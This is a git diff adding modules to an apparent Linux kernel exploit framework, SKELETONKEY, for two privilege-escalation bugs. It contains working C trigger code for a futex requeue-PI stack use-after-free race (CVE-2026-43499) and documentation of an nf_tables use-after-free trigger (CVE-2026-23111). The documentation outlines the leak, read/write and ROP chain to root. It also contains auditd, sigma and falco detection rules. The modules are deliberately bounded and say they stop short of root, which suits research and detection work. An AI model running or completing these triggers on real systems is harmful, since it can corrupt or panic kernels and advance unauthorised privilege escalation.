* overlap the walk with the rollback (the actual race), hard-bounded,
|
||||
* then stops. We do NOT widen the copy_from_user window (no memfd /
|
||||
* PUNCH_HOLE), do NOT spray/reoccupy the freed stack frame, and do NOT
|
||||
* weaponise. The honest witness is coarse: the -EDEADLK reachability
|
||||
* proof, plus a fault signal in the isolated child if a Phase-B race
|
||||
* happened to fire. Absence of a fault does NOT prove the host is safe.
|
||||
* ------------------------------------------------------------------ */
|
||||
#define GHL_PROBE_ROUNDS 8 /* deterministic -EDEADLK confirmations (early-exit on first) */
|
||||
#define GHL_RACE_ITERS 24 /* hard-bounded race-window exercise (concurrent sched_setattr) */
|
||||
#define GHL_RACE_BUDGET_SECS 2 /* honest short cap (public PoC grinds for minutes) */
|
||||
#define GHL_PARK_TIMEOUT_MS 60 /* parked waiter/owner self-unblock so no attempt hangs */
|
||||
|
||||
struct ghl_sched_attr {
|
||||
uint32_t size;
|
||||
uint32_t sched_policy;
|
||||
uint64_t sched_flags;
|
||||
int32_t sched_nice;
|
||||
uint32_t sched_priority;
|
||||
uint64_t sched_runtime;
|
||||
uint64_t sched_deadline;
|
||||
uint64_t sched_period;
|
||||
};
|
||||
|
||||
struct ghl_attempt {
|
||||
volatile uint32_t chain; /* PI futex the waiter holds */
|
||||
volatile uint32_t target; /* PI futex the owner holds; requeue destination */
|
||||
volatile uint32_t wait; /* plain futex the waiter parks on */
|
||||
atomic_int waiter_ready; /* waiter holds chain + published tid */
|
||||
atomic_int owner_ready; /* owner holds target + about to block on chain */
|
||||
atomic_int waiter_tid; /* consumer targets this tid */
|
||||
atomic_int stop; /* tear-down flag for the consumer */
|
||||
};
|
||||
|
||||
static long ghl_futex(volatile uint32_t *uaddr, int op, uint32_t val,
|
||||
void *timeout_or_val2, volatile uint32_t *uaddr2,
|
||||
uint32_t val3)
|
||||
{
|
||||
return syscall(SYS_futex, uaddr, op, val, timeout_or_val2, uaddr2, val3);
|
||||
}
|
||||
|
||||
static int ghl_gettid(void)
|
||||
{
|
||||
return (int)syscall(SYS_gettid);
|
||||
}
|
||||
|
||||
static void ghl_pin_cpu(int cpu)
|
||||
{
|
||||
cpu_set_t set;
|
||||
CPU_ZERO(&set);
|
||||
CPU_SET(cpu, &set);
|
||||
(void)sched_setaffinity(0, sizeof set, &set); /* best-effort */
|
||||
}
|
||||
|
||||
static void ghl_abs_realtime_ms(struct timespec *ts, long ms)
|
||||
{
|
||||
clock_gettime(CLOCK_REALTIME, ts);
|
||||
ts->tv_sec += ms / 1000;
|
||||
ts->tv_nsec += (ms % 1000) * 1000000L;
|
||||
if (ts->tv_nsec >= 1000000000L) { ts->tv_sec++; ts->tv_nsec -= 1000000000L; }
|
||||
}
|
||||
|
||||
static void *ghl_waiter_fn(void *arg)
|
||||
{
|
||||
struct ghl_attempt *a = (struct ghl_attempt *)arg;
|
||||
ghl_pin_cpu(0);
|
||||
/* Acquire the chain PI-futex (uncontended → success, sets it to our tid). */
|
||||
(void)ghl_futex(&a->chain, FUTEX_LOCK_PI, 0, NULL, NULL, 0);
|
||||
atomic_store_explicit(&a->waiter_tid, ghl_gettid(), memory_order_release);
|
||||
atomic_store_explicit(&a->waiter_ready, 1, memory_order_release);
|
||||
/* Park, pre-queued to be requeued onto `target`. Short absolute timeout
|
||||
* so we self-unblock even if the requeue is refused (-EDEADLK). */
|
||||
struct timespec ts;
|
||||
ghl_abs_realtime_ms(&ts, GHL_PARK_TIMEOUT_MS);
|
||||
(void)ghl_futex(&a->wait, FUTEX_WAIT_REQUEUE_PI | FUTEX_CLOCK_REALTIME, 0,
|
||||
&ts, &a->target, 0);
|
||||
(void)ghl_futex(&a->chain, FUTEX_UNLOCK_PI, 0, NULL, NULL, 0);
|
||||
return NULL;
|
||||
}
|
||||
|
||||
static void *ghl_owner_fn(void *arg)
|
||||
{
|
||||
struct ghl_attempt *a = (struct ghl_attempt *)arg;
|
||||
ghl_pin_cpu(0);
|
||||
while (!atomic_load_explicit(&a->waiter_ready, memory_order_acquire))
|
||||
sched_yield();
|
||||
(void)ghl_futex(&a->target, FUTEX_LOCK_PI, 0, NULL, NULL, 0); /* hold target */
|
||||
atomic_store_explicit(&a->owner_ready, 1, memory_order_release);
|
||||
struct timespec ts;
|
||||
ghl_abs_realtime_ms(&ts, GHL_PARK_TIMEOUT_MS);
|
||||
(void)ghl_futex(&a->chain, FUTEX_LOCK_PI, 0, &ts, NULL, 0); /* block on chain */
|
||||
(void)ghl_futex(&a->target, FUTEX_UNLOCK_PI, 0, NULL, NULL, 0);
|
||||
return NULL;
|
||||
}
|
||||
|
||||
static void *ghl_consumer_fn(void *arg)
|
||||
{
|
||||
struct ghl_attempt *a = (struct ghl_attempt *)arg;
|
||||
ghl_pin_cpu(1); /* sibling CPU */
|
||||
while (!atomic_load_explicit(&a->waiter_tid, memory_order_acquire))
|
||||
sched_yield();
|
||||
int tid = atomic_load_explicit(&a->waiter_tid, memory_order_acquire);
|
||||
struct ghl_sched_attr sa;
|
||||
memset(&sa, 0, sizeof sa);
|
||||
sa.size = sizeof sa;
|
||||
sa.sched_policy = SCHED_BATCH;
|
||||
sa.sched_nice = 19;
|
||||
/* Hammer a PI-chain priority walk on the waiter concurrently with the
|
||||
* rollback. SYS_sched_setattr may be absent on ancient toolchains. */
|
||||
while (!atomic_load_explicit(&a->stop, memory_order_acquire)) {
|
||||
#ifdef SYS_sched_setattr
|
||||
(void)syscall(SYS_sched_setattr, tid, &sa, 0u);
|
||||
#else
|
||||
sched_yield();
|
||||
#endif
|
||||
}
|
||||
return NULL;
|
||||
}
|
||||
|
||||
/* One attempt: build the requeue-PI cycle and fire CMP_REQUEUE_PI. With
|
||||
* with_race, run the concurrent sched_setattr storm. Returns 1 iff the
|
||||
* kernel returned -EDEADLK (the rollback path was reached). */
|
||||
static int ghl_one_attempt(int with_race)
|
||||
{
|
||||
struct ghl_attempt a;
|
||||
memset(&a, 0, sizeof a);
|
||||
|
||||
pthread_t tw, to, tc;
|
||||
int have_tc = 0;
|
||||
|
||||
if (pthread_create(&tw, NULL, ghl_waiter_fn, &a) != 0)
|
||||
return 0;
|
||||
while (!atomic_load_explicit(&a.waiter_ready, memory_order_acquire))
|
||||
sched_yield();
|
||||
|
||||
if (pthread_create(&to, NULL, ghl_owner_fn, &a) != 0) {
|
||||
atomic_store_explicit(&a.stop, 1, memory_order_release);
|
||||
pthread_join(tw, NULL);
|
||||
return 0;
|
||||
}
|
||||
while (!atomic_load_explicit(&a.owner_ready, memory_order_acquire))
|
||||
sched_yield();
|
||||
|
||||
if (with_race && pthread_create(&tc, NULL, ghl_consumer_fn, &a) == 0)
|
||||
have_tc = 1;
|
||||
|
||||
/* Settle: let the waiter park in WAIT_REQUEUE_PI and the owner in
|
||||
* LOCK_PI(chain) before we close the cycle. */
|
||||
usleep(3000);
|
||||
|
||||
errno = 0;
|
||||
long r = ghl_futex(&a.wait, FUTEX_CMP_REQUEUE_PI, 1,
|
||||
(void *)(uintptr_t)1, &a.target, 0);
|
||||
int got_edeadlk = (r == -1 && errno == EDEADLK);
|
||||
|
||||
atomic_store_explicit(&a.stop, 1, memory_order_release);
|
||||
if (have_tc) pthread_join(tc, NULL);
|
||||
pthread_join(to, NULL); /* parked threads self-unblock via their timeouts */
|
||||
pthread_join(tw, NULL);
|
||||
return got_edeadlk;
|
||||
}
|
||||
|
||||
static skeletonkey_result_t ghostlock_exploit(const struct skeletonkey_ctx *ctx)
|
||||
{
|
||||
skeletonkey_result_t pre = ghostlock_detect(ctx);
|
||||
if (pre != SKELETONKEY_VULNERABLE) {
|
||||
fprintf(stderr, "[-] ghostlock: detect() says not vulnerable; refusing\n");
|
||||
return pre;
|
||||
}
|
||||
bool is_root = ctx->host ? ctx->host->is_root : (geteuid() == 0);
|
||||
if (is_root) {
|
||||
fprintf(stderr, "[i] ghostlock: already running as root\n");
|
||||
return SKELETONKEY_OK;
|
||||
}
|
||||
|
||||
if (!ctx->json)
|
||||
fprintf(stderr, "[*] ghostlock: reconstructed reachability probe — builds "
|
||||
"the requeue-PI cycle and confirms the -EDEADLK "
|
||||
"remove_waiter() rollback path is reachable, then exercises "
|
||||
"the race window %d bounded times (%ds cap) with a "
|
||||
"sibling-CPU sched_setattr storm, and stops. The "
|
||||
"KernelSnitch leak → forged-waiter → fops/ashmem/pipe R/W "
|
||||
"→ cred-patch root-pop is NOT bundled.\n",
|
||||
GHL_RACE_ITERS, GHL_RACE_BUDGET_SECS);
|
||||
|
||||
/* Fork-isolated: a *won* Phase-B race corrupts the kernel stack. On a
|
||||
* KASAN kernel that oopses (contained to the child); on a plain
|
||||
* vulnerable kernel it may panic — which is exactly why the attempt
|
||||
* count is hard-bounded and the window is never widened. */
|
||||
pid_t child = fork();
|
||||
if (child < 0) { perror("[-] fork"); return SKELETONKEY_TEST_ERROR; }
|
||||
|
||||
if (child == 0) {
|
||||
/* Phase A — deterministic, safe reachability confirmation. */
|
||||
int edeadlk = 0;
|
||||
for (int i = 0; i < GHL_PROBE_ROUNDS && !edeadlk; i++)
|
||||
edeadlk = ghl_one_attempt(0 /* no race */);
|
||||
|
||||
/* Phase B — hard-bounded window exercise (concurrent priority walk). */
|
||||
int fired = 0;
|
||||
time_t deadline = time(NULL) + GHL_RACE_BUDGET_SECS;
|
||||
for (int i = 0; i < GHL_RACE_ITERS && time(NULL) < deadline; i++) {
|
||||
(void)ghl_one_attempt(1 /* with race */);
|
||||
fired = i + 1;
|
||||
}
|
||||
|
||||
if (!ctx->json)
|
||||
fprintf(stderr, "[i] ghostlock: requeue-PI rollback reachable: %s; "
|
||||
"%d bounded race-window iterations fired\n",
|
||||
edeadlk ? "YES (-EDEADLK observed)" : "not observed", fired);
|
||||
_exit(edeadlk ? 100 : 101);
|
||||
}
|
||||
|
||||
int status;
|
||||
waitpid(child, &status, 0);
|
||||
if (WIFSIGNALED(status)) {
|
||||
if (!ctx->json)
|
||||
fprintf(stderr, "[!] ghostlock: child died by signal %d — the "
|
||||
"requeue-PI stack UAF may have fired (KASAN oops / "
|
||||
"corruption fault). This is the bug, but no root was "
|
||||
"obtained.\n",
|
||||
WTERMSIG(status));
|
||||
return SKELETONKEY_EXPLOIT_FAIL;
|
||||
}
|
||||
if (WIFEXITED(status) &&
|
||||
(WEXITSTATUS(status) == 100 || WEXITSTATUS(status) == 101)) {
|
||||
if (!ctx->json) {
|
||||
if (WEXITSTATUS(status) == 100)
|
||||
fprintf(stderr, "[!] ghostlock: the vulnerable requeue-PI "
|
||||
"deadlock-rollback path IS reachable here "
|
||||
"(-EDEADLK) and the race window was exercised — "
|
||||
"reconstructed primitive, honest EXPLOIT_FAIL.\n");
|
||||
else
|
||||
fprintf(stderr, "[!] ghostlock: race window exercised but the "
|
||||
"-EDEADLK rollback path was not observed (timing, "
|
||||
"or a hardened/patched-at-runtime kernel) — honest "
|
||||
"EXPLOIT_FAIL.\n");
|
||||
fprintf(stderr, "[i] ghostlock: to complete: port the public "
|
||||
"KernelSnitch page leak + forged on-stack "
|
||||
"rt_mutex_waiter + fops/configfs/ashmem/pipe R/W + "
|
||||
"cred patch for CVE-2026-43499 (Android/Pixel-specific, "
|
||||
"per-build offsets — not bundled).\n");
|
||||
}
|
||||
return SKELETONKEY_EXPLOIT_FAIL;
|
||||
}
|
||||
if (!ctx->json)
|
||||
fprintf(stderr, "[-] ghostlock: probe setup failed (child rc=%d)\n",
|
||||
WIFEXITED(status) ? WEXITSTATUS(status) : -1);
|
||||
return SKELETONKEY_EXPLOIT_FAIL;
|
||||
}
|
||||
|
||||
#else /* !__linux__ */
|
||||
|
||||
static skeletonkey_result_t ghostlock_detect(const struct skeletonkey_ctx *ctx)
|
||||
{
|
||||
if (!ctx->json)
|
||||
fprintf(stderr, "[i] ghostlock: Linux-only module (rtmutex/futex "
|
||||
"requeue-PI stack UAF) — not applicable here\n");
|
||||
return SKELETONKEY_PRECOND_FAIL;
|
||||
}
|
||||
static skeletonkey_result_t ghostlock_exploit(const struct skeletonkey_ctx *ctx)
|
||||
{
|
||||
(void)ctx;
|
||||
fprintf(stderr, "[-] ghostlock: Linux-only module — cannot run here\n");
|
||||
return SKELETONKEY_PRECOND_FAIL;
|
||||
}
|
||||
|
||||
#endif /* __linux__ */
|
||||
|
||||
/* ----- Embedded detection rules -----
|
||||
*
|
||||
* Honesty note (see MODULE.md): unlike most kernel races, GhostLock has a
|
||||
* genuinely distinctive behavioural tell — a futex requeue-PI operation
|
||||
* (FUTEX_WAIT_REQUEUE_PI / FUTEX_CMP_REQUEUE_PI) returning -EDEADLK, which
|
||||
* glibc's requeue-PI usage inside pthread_cond_wait never provokes. The
|
||||
* catch: auditd/sigma see the `futex` syscall but not its op-vs-return
|
||||
* cheaply, and a bare `-S futex` watch would flood any host (futex is one
|
||||
* of the busiest syscalls). So the deployable auditd/sigma rules anchor on
|
||||
* the far rarer sched_setattr (the sibling-thread priority-walk driver) and
|
||||
* the post-exploitation euid-0 transition; the high-fidelity
|
||||
* requeue-PI-returns-EDEADLK signal is expressed in the falco/eBPF rule,
|
||||
* which can see the op and the return value. Tune per environment.
|
||||
*/
|
||||
static const char ghostlock_auditd[] =
|
||||
"# GhostLock — rtmutex/futex requeue-PI remove_waiter() stack UAF (CVE-2026-43499) — auditd rules\n"
|
||||
"# NOTE: a bare `-S futex` watch would flood auditd (futex is ubiquitous) and\n"
|
||||
"# auditd cannot cheaply test a syscall's return against its op, so we anchor on\n"
|
||||
"# the far rarer sched_setattr — the GhostLock trigger fires it on a SIBLING\n"
|
||||
"# thread in a tight loop (policy SCHED_BATCH) to drive the PI-chain priority\n"
|
||||
"# walk that wins the race — plus sched_setaffinity CPU pinning of the racers.\n"
|
||||
"# The high-fidelity 'requeue-PI returns EDEADLK' tell needs an eBPF/falco layer\n"
|
||||
"# that can see the op+retval (see the shipped falco rule). Correlate these in\n"
|
||||
"# your SIEM per-pid within a short window; individually they are benign.\n"
|
||||
"-a always,exit -F arch=b64 -S sched_setattr -k skeletonkey-ghostlock-schedattr\n"
|
||||
"-a always,exit -F arch=b64 -S sched_setaffinity -k skeletonkey-ghostlock-affinity\n"
|
||||
"# Post-exploitation fallback: unprivileged process -> euid 0 with no setuid execve.\n"
|
||||
"-a always,exit -F arch=b64 -S setresuid -F a0=0 -F a1=0 -F a2=0 -F auid>=1000 -F auid!=4294967295 -k skeletonkey-ghostlock-priv\n"
|
||||
"-a always,exit -F arch=b64 -S setuid -F a0=0 -F auid>=1000 -F auid!=4294967295 -k skeletonkey-ghostlock-priv\n";
|
||||
|
||||
static const char ghostlock_sigma[] =
|
||||
"title: Possible CVE-2026-43499 GhostLock rtmutex/futex requeue-PI stack UAF\n"
|
||||
"id: 2f8a6b4c-skeletonkey-ghostlock\n"
|
||||
"status: experimental\n"
|
||||
"description: |\n"
|
||||
" GhostLock (CVE-2026-43499) is a stack UAF in the rtmutex/futex requeue-PI\n"
|
||||
" rollback path, reachable by any unprivileged user via futex(2) +\n"
|
||||
" sched_setattr(2). The strongest behavioural tell is a futex requeue-PI op\n"
|
||||
" (FUTEX_WAIT_REQUEUE_PI=11 / FUTEX_CMP_REQUEUE_PI=12) returning -EDEADLK\n"
|
||||
" (glibc never provokes this) interleaved with sched_setattr(SCHED_BATCH)\n"
|
||||
" targeting a SIBLING thread and sched_setaffinity CPU pinning — but auditd\n"
|
||||
" cannot see the futex op/return cheaply, so this rule keys on the rarer\n"
|
||||
" sched_setattr driver and the post-exploitation euid-0 transition. Use the\n"
|
||||
" falco/eBPF rule for the high-fidelity requeue-PI-EDEADLK signal. Expect\n"
|
||||
" false positives from legitimate real-time / scheduler-tuning daemons.\n"
|
||||
"logsource: {product: linux, service: auditd}\n"
|
||||
"detection:\n"
|
||||
" schedattr: {type: 'SYSCALL', syscall: 'sched_setattr'}\n"
|
||||
" uid0: {type: 'SYSCALL', syscall: 'setresuid', a0: 0, a1: 0, a2: 0}\n"
|
||||
" unpriv: {auid|expression: '>= 1000'}\n"
|
||||
" condition: schedattr or (uid0 and unpriv)\n"
|
||||
"level: medium\n"
|
||||
"tags: [attack.privilege_escalation, attack.t1068, cve.2026.43499]\n";
|
||||
|
||||
static const char ghostlock_falco[] =
|
||||
"- rule: Futex requeue-PI EDEADLK with sibling sched_setattr (possible CVE-2026-43499)\n"
|
||||
" desc: |\n"
|
||||
" GhostLock (CVE-2026-43499) rtmutex/futex requeue-PI stack UAF. High-fidelity\n"
|
||||
" tell (needs a futex-aware eBPF probe that exposes the op + return value): a\n"
|
||||
" FUTEX_WAIT_REQUEUE_PI / FUTEX_CMP_REQUEUE_PI that returns EDEADLK — glibc's\n"
|
||||
" requeue-PI usage inside pthread_cond_wait never provokes it — combined with\n"
|
||||
" the same tgid calling sched_setattr(SCHED_BATCH) on a sibling thread. Where\n"
|
||||
" the probe cannot decode the futex op, fall back to the post-exploitation\n"
|
||||
" effect below: a non-root process becoming root outside a setuid binary.\n"
|
||||
" condition: >\n"
|
||||
" (evt.type = futex and evt.rawres = -35) or\n"
|
||||
" (evt.type in (setuid, setresuid) and evt.arg.uid = 0 and\n"
|
||||
" not proc.is_setuid = true and user.uid != 0)\n"
|
||||
" output: >\n"
|
||||
" Possible CVE-2026-43499 GhostLock requeue-PI stack UAF\n"
|
||||
" (user=%user.name proc=%proc.name pid=%proc.pid ppid=%proc.ppid evt=%evt.type res=%evt.res)\n"
|
||||
" priority: WARNING\n"
|
||||
" tags: [process, mitre_privilege_escalation, T1068, cve.2026.43499]\n";
|
||||
|
||||
const struct skeletonkey_module ghostlock_module = {
|
||||
.name = "ghostlock",
|
||||
.cve = "CVE-2026-43499",
|
||||
.summary = "rtmutex/futex requeue-PI remove_waiter() stack UAF (\"GhostLock\") — clears pi_blocked_on on the wrong task during -EDEADLK rollback; ~15-year range, unprivileged, no userns",
|
||||
.family = "rtmutex",
|
||||
.kernel_range = "2.6.39 <= K < fix (introduced with PI-futex requeue); fixed 3bfdc63936dd (7.1-rc1), stable backports 7.0.4 / 6.18.27 / 6.12.86 / 6.6.140 / 6.1.175; 5.15/5.10/5.4/4.19 affected with no upstream stable fix; < 2.6.39 not affected",
|
||||
.detect = ghostlock_detect,
|
||||
.exploit = ghostlock_exploit,
|
||||
.mitigate = NULL, /* mitigation: upgrade kernel — PI futexes cannot be disabled at runtime, no userns/sysctl stopgap */
|
||||
.cleanup = NULL, /* trigger creates only throwaway futex words + threads in a fork-isolated child; no host artifacts */
|
||||
.detect_auditd = ghostlock_auditd,
|
||||
.detect_sigma = ghostlock_sigma,
|
||||
.detect_yara = NULL, /* pure in-kernel race — no file artifact to match */
|
||||
.detect_falco = ghostlock_falco,
|
||||
.opsec_notes = "detect() is a pure kernel-version gate (vulnerable iff >= 2.6.39 AND below the on-branch fix: stable backports 7.0.4 / 6.18.27 / 6.12.86 / 6.6.140 / 6.1.175, 7.1+ inherits mainline; 5.15/5.10/5.4/4.19 affected with no upstream fix) — no userns/CONFIG probe (CVSS PR:L, any local user; CONFIG_FUTEX_PI assumed, near-universal). exploit() forks an isolated child that (A) builds the requeue-PI cycle and confirms the -EDEADLK remove_waiter() rollback path is reachable — deterministic and safe, since without a concurrent priority walk the unwind creates no dangling pointer — then (B) exercises the actual race a hard-bounded 24 iterations / 2s with a sibling-CPU sched_setattr(SCHED_BATCH) storm on the waiter's tid, and stops. It is deliberately UNDER-DRIVEN: it does not widen the copy_from_user window (no memfd/PUNCH_HOLE), does not spray/reoccupy the freed kernel-stack frame, and does not bundle the KernelSnitch leak → forged on-stack rt_mutex_waiter → fops/configfs/ashmem/pipe R/W → cred-patch root-pop (Android/Pixel-specific, per-build offsets); the trigger is reconstructed from the public VEGA/Nebula PoC, not VM-verified, and returns EXPLOIT_FAIL. Telemetry footprint — unlike most kernel races GhostLock has a real behavioural signature: a burst of futex requeue-PI ops returning EDEADLK (glibc never does this) plus tight-loop sched_setattr(SCHED_BATCH) on a sibling thread and sched_setaffinity CPU pinning; and, only if a Phase-B race fires on a vulnerable host, a possible KASAN oops or kernel-stack panic. No persistent files. Lowest --auto safety rank in the corpus: a won race corrupts the kernel stack and drives a near-arbitrary pointer write.",
|
||||
.arch_support = "any",
|
||||
};
|
||||
|
||||
void skeletonkey_register_ghostlock(void)
|
||||
{
|
||||
skeletonkey_register(&ghostlock_module);
|
||||
}
|
||||
@@ -0,0 +1,12 @@
|
||||
/*
|
||||
* ghostlock_cve_2026_43499 — SKELETONKEY module registry hook
|
||||
*/
|
||||
|
||||
#ifndef GHOSTLOCK_SKELETONKEY_MODULES_H
|
||||
#define GHOSTLOCK_SKELETONKEY_MODULES_H
|
||||
|
||||
#include "../../core/module.h"
|
||||
|
||||
extern const struct skeletonkey_module ghostlock_module;
|
||||
|
||||
#endif
|
||||
@@ -90,6 +90,8 @@
|
||||
* and declare the few socket constants we need by hand. IPPROTO_RAW
|
||||
* is provided by linux/in.h; SOL_IP is glibc-only so we hardcode it
|
||||
* (Linux constant value 0). */
|
||||
#include <linux/if.h> /* IFNAMSIZ — ip_tables.h uses it but doesn't pull it
|
||||
* in on older kernel headers (e.g. Ubuntu 16.04). */
|
||||
#include <linux/netfilter_ipv4/ip_tables.h>
|
||||
#ifndef SOL_IP
|
||||
#define SOL_IP 0
|
||||
|
||||
@@ -0,0 +1,62 @@
|
||||
# nft_catchall — CVE-2026-23111
|
||||
|
||||
An nf_tables use-after-free reachable from an unprivileged user: an
|
||||
inverted condition in `nft_map_catchall_activate()` mishandles catch-all
|
||||
map elements on transaction abort, freeing a chain that a catch-all GOTO
|
||||
verdict still references.
|
||||
|
||||
## The bug
|
||||
|
||||
nftables *maps* can hold a **catch-all** element — a default that matches
|
||||
when no other element does — and in a verdict map that element carries a
|
||||
GOTO/JUMP to a chain. `nft_map_catchall_activate()` runs during the
|
||||
**abort** phase of a netlink transaction to re-activate elements that a
|
||||
rolled-back batch had touched. A single inverted `!` makes it operate on
|
||||
*active* catch-all elements instead of skipping them, so the referenced
|
||||
chain's use-count is driven to zero; a subsequent `DELCHAIN` frees the
|
||||
chain while the catch-all verdict still points at it → **use-after-free**.
|
||||
|
||||
Chaining a kernel-address leak, arbitrary R/W, and a ROP over
|
||||
`modprobe_path` / `selinux_state` turns the UAF into root — all reachable
|
||||
by an unprivileged user who has `CONFIG_USER_NS` to gain `CAP_NET_ADMIN`
|
||||
over a private network namespace.
|
||||
|
||||
## Affected range
|
||||
|
||||
| | |
|
||||
|---|---|
|
||||
| Vulnerable path introduced | ~5.13 (catch-all set elements) |
|
||||
| Fixed upstream | commit `f41c5d1…` (remove the inverted `!`) |
|
||||
| Debian backports | 6.1.164 (bookworm) · 6.12.73 (trixie) · 6.18.10 (forky·sid) |
|
||||
| Table thresholds | 6.1.164 · 6.12.73 · 6.18.10 (≤ Debian → drift-clean) |
|
||||
| NVD class | CWE-416 (Use After Free), CVSS 7.8 |
|
||||
| CISA KEV | no |
|
||||
|
||||
The 5.10 (bullseye) branch is still unfixed at time of writing →
|
||||
version-only VULNERABLE there.
|
||||
|
||||
## Trigger / detection
|
||||
|
||||
`detect()` returns `OK` below ~5.13 or for patched kernels, `PRECOND_FAIL`
|
||||
when the kernel is vulnerable but unprivileged user-namespace clone is
|
||||
denied (exploit unreachable), and `VULNERABLE` when the version is in
|
||||
range and userns is allowed.
|
||||
|
||||
`exploit()` forks an isolated child that enters `unshare(USER|NET)`, opens
|
||||
`NETLINK_NETFILTER`, builds a verdict map with a catch-all GOTO element,
|
||||
and sends an aborting batch to drive the abort-path UAF; it observes
|
||||
`nft_chain` / `kmalloc-cg-256` slabinfo and returns `EXPLOIT_FAIL`
|
||||
(primitive-only). The full leak + R/W + ROP root-pop is **not** bundled,
|
||||
and the trigger is reconstructed from public analysis, not VM-verified.
|
||||
|
||||
## Fix / mitigation
|
||||
|
||||
Upgrade the kernel. As a host hardening stopgap, deny unprivileged
|
||||
user-namespace clone (`sysctl kernel.unprivileged_userns_clone=0`, or the
|
||||
AppArmor `apparmor_restrict_unprivileged_userns` toggle) — that closes the
|
||||
unprivileged path even on a kernel-vulnerable host.
|
||||
|
||||
## Credit
|
||||
|
||||
Upstream fix `f41c5d1…`; public reproduction by FuzzingLabs. See
|
||||
`NOTICE.md`.
|
||||
@@ -0,0 +1,62 @@
|
||||
# NOTICE — nft_catchall (CVE-2026-23111)
|
||||
|
||||
## Vulnerability
|
||||
|
||||
**CVE-2026-23111** — a **use-after-free** in the Linux kernel `nf_tables`
|
||||
(netfilter) transaction-abort path. `nft_map_catchall_activate()` carries
|
||||
an **inverted condition** (a stray `!`): during a transaction *abort* it
|
||||
processes *active* catch-all set elements instead of skipping them. A
|
||||
catch-all element in an nftables **map** holds a verdict (GOTO/JUMP)
|
||||
referencing a chain; the wrong (de)activation drives the chain's
|
||||
use-count to zero, so a following `DELCHAIN` frees the chain while the
|
||||
catch-all verdict element still references it → UAF.
|
||||
|
||||
From an **unprivileged** local user — via **user namespaces + nftables**
|
||||
(needs `CONFIG_USER_NS` + `CONFIG_NF_TABLES`) — the UAF is escalatable to
|
||||
root: leak a kernel address, obtain arbitrary R/W, ROP over
|
||||
`modprobe_path` / `selinux_state`.
|
||||
|
||||
NVD class: **CWE-416** (Use After Free). CVSS v3.1 **7.8 HIGH**
|
||||
(`AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H`). Affects current distros (Debian
|
||||
bookworm/trixie, Ubuntu 22.04/24.04). **Not** in CISA KEV.
|
||||
|
||||
The fix removed a single character (the inverted `!`).
|
||||
|
||||
## Research credit
|
||||
|
||||
- **Fixed upstream** by commit
|
||||
`f41c5d151078c5348271ffaf8e7410d96f2d82f8` ("netfilter: nf_tables: fix
|
||||
… catch-all … activate"); reported and fixed through the Linux kernel
|
||||
security process (NVD lists the source as `kernel.org`; no public
|
||||
individual reporter name in the advisory).
|
||||
- **Public reproduction + analysis** by **FuzzingLabs** —
|
||||
<https://fuzzinglabs.com/repro-cve-2026-23111/> — which the module's
|
||||
trigger reconstruction is informed by.
|
||||
- Debian security tracker (authoritative backport versions):
|
||||
<https://security-tracker.debian.org/tracker/CVE-2026-23111> —
|
||||
bookworm 6.1.164 / trixie 6.12.73 / forky·sid 6.18.10 (bullseye/5.10
|
||||
still unfixed at time of writing).
|
||||
|
||||
All credit for finding and analysing this bug belongs to the upstream
|
||||
reporter and to FuzzingLabs for the public write-up. SKELETONKEY is the
|
||||
bundling and bookkeeping layer only.
|
||||
|
||||
## SKELETONKEY role
|
||||
|
||||
🟡 **Trigger (reconstructed) — primitive-only, not VM-verified.** This is
|
||||
one more UAF in the corpus's most-covered subsystem (`nf_tables`,
|
||||
`nft_set_uaf`, `nft_payload`, `nft_pipapo`, …), shipped on the same
|
||||
contract as `nf_tables` (CVE-2024-1086): a fork-isolated trigger that
|
||||
fires the bug class and stops.
|
||||
|
||||
`detect()` version-gates against the Debian backports above (upstream
|
||||
thresholds 6.1.164 / 6.12.73 / 6.18.10; catch-all set elements arrived in
|
||||
~5.13, so older kernels lack the path) **and** requires unprivileged
|
||||
user-namespace clone — a vulnerable kernel with userns locked down is
|
||||
`PRECOND_FAIL`. `exploit()` builds a verdict map with a catch-all GOTO
|
||||
element and provokes an aborting batch transaction to drive the
|
||||
abort-path UAF, observes slabinfo, and returns `EXPLOIT_FAIL`. The
|
||||
per-kernel leak + arbitrary-R/W + `modprobe_path` ROP that lands a root
|
||||
shell is **not** bundled (per-build offsets refused), and the trigger is
|
||||
reconstructed from the public analysis rather than VM-verified — it never
|
||||
claims root it did not get.
|
||||
@@ -0,0 +1,589 @@
|
||||
/*
|
||||
* nft_catchall_cve_2026_23111 — SKELETONKEY module
|
||||
*
|
||||
* CVE-2026-23111 — a use-after-free in the Linux kernel's nf_tables
|
||||
* (netfilter) transaction-abort path. `nft_map_catchall_activate()`
|
||||
* carries an inverted condition (a stray `!`): on transaction abort it
|
||||
* processes *active* catch-all set elements instead of skipping them.
|
||||
* A catch-all element in an nftables *map* holds a verdict (GOTO/JUMP)
|
||||
* that references a chain; the wrong (de)activation lets the chain's
|
||||
* use-count reach zero so a following DELCHAIN frees it while the
|
||||
* catch-all verdict element still points at it → UAF. From an
|
||||
* unprivileged user (via user namespaces + nftables) this is escalatable
|
||||
* to root: leak a kernel address, win arbitrary R/W, ROP over
|
||||
* modprobe_path / selinux_state.
|
||||
*
|
||||
* CWE-416 (Use After Free). CVSS 7.8 (AV:L/AC:L/PR:L/UI:N/C:H/I:H/A:H).
|
||||
* Fixed upstream by commit f41c5d151078c5348271ffaf8e7410d96f2d82f8
|
||||
* ("remove one exclamation mark"). Public reproduction + analysis by
|
||||
* FuzzingLabs. NOT in CISA KEV.
|
||||
*
|
||||
* STATUS: 🟡 TRIGGER (reconstructed) — primitive-only, NOT VM-verified.
|
||||
* This is one more UAF in the most-covered subsystem in the corpus
|
||||
* (see nf_tables / nft_set_uaf / nft_payload / nft_pipapo / ...), and
|
||||
* like nf_tables (CVE-2024-1086) it is shipped as a fork-isolated
|
||||
* trigger that fires the bug class and STOPS. detect() version-gates
|
||||
* against the Debian-tracked backports below and additionally requires
|
||||
* unprivileged user-namespace clone (the bug is unreachable to an
|
||||
* unprivileged user without it). exploit() builds a map with a
|
||||
* catch-all GOTO element and provokes a failed (aborting) batch
|
||||
* transaction to drive the abort-path UAF, observes slabinfo, and
|
||||
* returns EXPLOIT_FAIL — the per-kernel leak + arbitrary-R/W + ROP that
|
||||
* lands a root shell is NOT bundled (per-build offsets refused), and
|
||||
* the trigger itself is reconstructed from the public analysis rather
|
||||
* than VM-verified. It never claims root it did not get.
|
||||
*
|
||||
* Affected range (Debian-tracked stable backports of the fix):
|
||||
* 6.1.x : K >= 6.1.164 (bookworm)
|
||||
* 6.12.x : K >= 6.12.73 (trixie)
|
||||
